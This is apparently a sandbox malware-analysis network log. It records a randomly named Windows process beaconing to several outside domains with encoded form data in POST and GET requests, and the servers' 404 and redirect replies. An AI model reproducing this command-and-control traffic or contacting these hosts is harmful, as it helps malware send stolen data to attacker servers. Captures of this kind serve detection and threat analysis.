                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49717 | Destination IP: 172.96.187.60 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:59.623418093 CEST | 1803 | OUT | POST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Data Ascii: vf5pwn= [TRUNCATED]
Sep 26, 2024 15:23:00.059273958 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:23:00 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49718 | Destination IP: 172.96.187.60 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:23:02.183551073 CEST | 522 | OUT | GET /v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dalong.site
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Sep 26, 2024 15:23:02.624314070 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:23:02 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49719 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:23:07.737963915 CEST | 793 | OUT | POST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: vf5pwn=TKQUtJlMp/1FV5p5Db6M229HL9W7RSf+Afit8fQsnrzwV3dL20tBIoJk4k8musKSV9oytxoSNbSSmqzsnGq4vmF6R3A80I+wWXUgxdIoQJ6WVVl4a0w5BhIfoT4zOFNq6fc+BOTtvcvw9LGL+UEXI3fYmybBTeYE8aeRNgUBz+0YZ3udXN8hzzBko1/GTEko+/stxCU=


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49720 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:23:10.471750975 CEST | 813 | OUT | POST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: vf5pwn=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3kffwUVFL3w5BJoJktU8nzcKnV9kMt0QSNYuSmrDsnVC7gWFkeXA65o+wWXUgxddgQJCWVlV4Llw+aBIc/j4zKFNx6fcYBPPHvenw9LWL+AYUG3fSrSaDbNlj8qeRFCYBw9gMRhD3Nv0JgTtc4m3xC0FBkc8dvVBRxWl2RFJaZuDQuIIrX6OR


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49721 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:23:13.021862030 CEST | 1830 | OUT | POST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 65 4c 77 56 67 5a 4c 32 58 46 42 62 59 4a 6b 73 55 38 36 7a 63 4b 36 56 39 73 41 74 30 4d 73 4e 64 71 53 6e 49 62 73 32 30 43 37 37 6d 46 6b 63 58 41 2f 30 49 2b 6c 57 58 6b 6b 78 64 4e 67 51 4a 43 57 56 6e 4e 34 62 45 77 2b 64 78 49 66 6f 54 34 42 4f 46 4d 2f 36 66 46 6a 42 50 62 39 76 50 48 77 38 76 4b 4c 38 7a 77 55 4b 33 66 63 34 69 61 68 62 4e 70 38 38 71 43 6e 46 48 6c 6b 77 39 49 4d 52 6c 32 36 5a 4d 49 70 79 41 35 51 32 58 7a 54 59 6a 74 69 75 76 38 35 74 33 5a 65 35 31 39 35 54 69 52 4f 4d 74 43 62 31 2b 73 46 58 71 76 5a 51 36 46 47 31 61 66 63 79 38 56 6e 45 64 4e 46 6f 77 53 55 6a 6a 71 51 71 6a 4b 75 55 61 6a 75 57 4a 42 45 55 41 4a 44 4c 6b 48 78 43 4e 77 68 45 4a 30 69 69 2b 6c 64 46 62 52 64 47 51 42 6c 58 37 30 65 47 46 57 71 37 63 6a 7a 6a 34 41 30 38 2f 7a 57 44 49 33 41 56 2f 71 35 33 55 69 63 34 2b 4c 49 54 43 4b 65 65 59 51 32 53 52 4d [TRUNCATED]
                                              Data Ascii: vf5pwn=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 [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.5 | 49722 | 3.33.130.190 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:15.565221071 CEST | 531 | OUT | GET /xamn/?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4fWnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mgeducacaopro.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:23:16.977345943 CEST | 416 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 26 Sep 2024 13:23:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 276
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 66 35 70 77 6e 3d 65 49 34 30 75 2b 6b 58 6c 36 64 43 4e 4f 78 74 4f 71 61 56 68 33 74 32 53 74 32 4d 55 58 4c 4b 58 50 6e 41 32 6f 52 56 68 35 37 63 62 31 46 4f 79 77 35 61 63 4b 74 31 75 53 56 6b 72 74 4f 47 65 50 55 43 6e 6c 55 51 49 4a 53 37 6b 5a 6a 61 68 53 57 52 34 57 34 66 57 6e 41 76 2f 66 71 70 64 6d 34 57 35 38 77 78 49 73 76 4a 4f 46 38 2f 63 47 64 48 48 30 51 7a 74 43 59 71 44 55 4e 68 76 51 3d 3d 26 6c 48 75 6c 3d 6e 66 51 54 71 4c 34 30 76 44 45 70 49 70 33 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4fWnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.5 | 49724 | 67.223.117.189 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:22.129138947 CEST | 769 | OUT | POST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 30 5a 50 59 48 74 39 58 66 65 4c 57 76 59 67 6e 62 51 70 47 34 43 52 46 53 73 39 76 56 39 51 56 46 6f 43 59 4c 41 78 41 6f 62 52 50 6e 6e 39 75 49 77 71 33 4a 77 37 66 44 42 32 4a 37 6b 4a 30 70 70 51 33 73 38 47 66 6a 51 50 6b 35 4f 64 4e 44 4f 4f 6a 57 4a 4b 6f 67 63 64 37 45 46 54 49 2f 74 51 64 5a 71 46 59 4b 77 36 78 7a 36 6e 47 50 4a 39 78 63 4f 32 66 76 51 71 58 74 2f 67 5a 76 67 78 71 43 53 73 45 44 44 2f 53 37 65 49 45 45 74 61 64 4e 36 67 75 51 4c 54 2b 65 52 68 58 66 4a 78 37 48 69 66 41 62 6b 30 50 4b 2b 4a 36 4e 5a 4e 6f 68 65 41 50 63 77 3d
                                              Data Ascii: vf5pwn=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtadN6guQLT+eRhXfJx7HifAbk0PK+J6NZNoheAPcw=
                                              Sep 26, 2024 15:23:22.709606886 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:22 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:22.709640026 CEST | 1236 | IN | Data Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 26, 2024 15:23:22.709655046 CEST | 448 | IN | Data Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 26, 2024 15:23:22.709822893 CEST | 1236 | IN | Data Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                              Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                              Sep 26, 2024 15:23:22.709830046 CEST | 1236 | IN | Data Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                                              Sep 26, 2024 15:23:22.710150003 CEST | 1236 | IN | Data Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                                              Sep 26, 2024 15:23:22.710156918 CEST | 1236 | IN | Data Raw: 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65
                                              Data Ascii: pdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav2" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Features
                                              Sep 26, 2024 15:23:22.710163116 CEST | 896 | IN | Data Raw: 6c 22 3e 48 65 61 64 65 72 20 4d 65 67 61 20 6d 65 6e 75 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: l">Header Mega menu</a></li> </ul> </li> <li><a class="dropdown-item dropdown-toggl
                                              Sep 26, 2024 15:23:22.710556984 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                              Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 26, 2024 15:23:22.710571051 CEST | 1236 | IN | Data Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                              Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                              Sep 26, 2024 15:23:22.714574099 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.5 | 49725 | 67.223.117.189 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:24.677985907 CEST | 789 | OUT | POST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 4e 51 56 6e 77 43 5a 50 55 78 42 6f 62 52 58 58 6e 38 6a 6f 77 74 33 4a 38 4a 66 43 39 32 4a 37 77 4a 30 70 5a 51 33 66 45 46 66 7a 51 4e 2f 4a 50 62 4a 44 4f 4f 6a 57 4a 4b 6f 67 59 6e 37 45 64 54 49 50 39 51 50 4e 2b 43 65 36 77 31 77 7a 36 6e 4c 76 4a 35 78 63 50 6a 66 72 51 45 58 76 33 67 5a 71 45 78 71 7a 53 76 4e 44 44 44 4e 72 66 69 4b 6c 51 44 62 38 4c 68 76 53 43 79 70 76 4e 2b 53 70 6b 62 68 6c 71 33 54 37 49 4d 66 5a 32 2b 72 39 34 6b 79 43 4f 77 52 4c 6b 57 61 6f 2b 75 57 72 5a 54 74 7a 74 34 37 6f 43 32 30 50 2b 4c
                                              Data Ascii: vf5pwn=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjNQVnwCZPUxBobRXXn8jowt3J8JfC92J7wJ0pZQ3fEFfzQN/JPbJDOOjWJKogYn7EdTIP9QPN+Ce6w1wz6nLvJ5xcPjfrQEXv3gZqExqzSvNDDDNrfiKlQDb8LhvSCypvN+Spkbhlq3T7IMfZ2+r94kyCOwRLkWao+uWrZTtzt47oC20P+L
                                              Sep 26, 2024 15:23:25.261872053 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:25 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
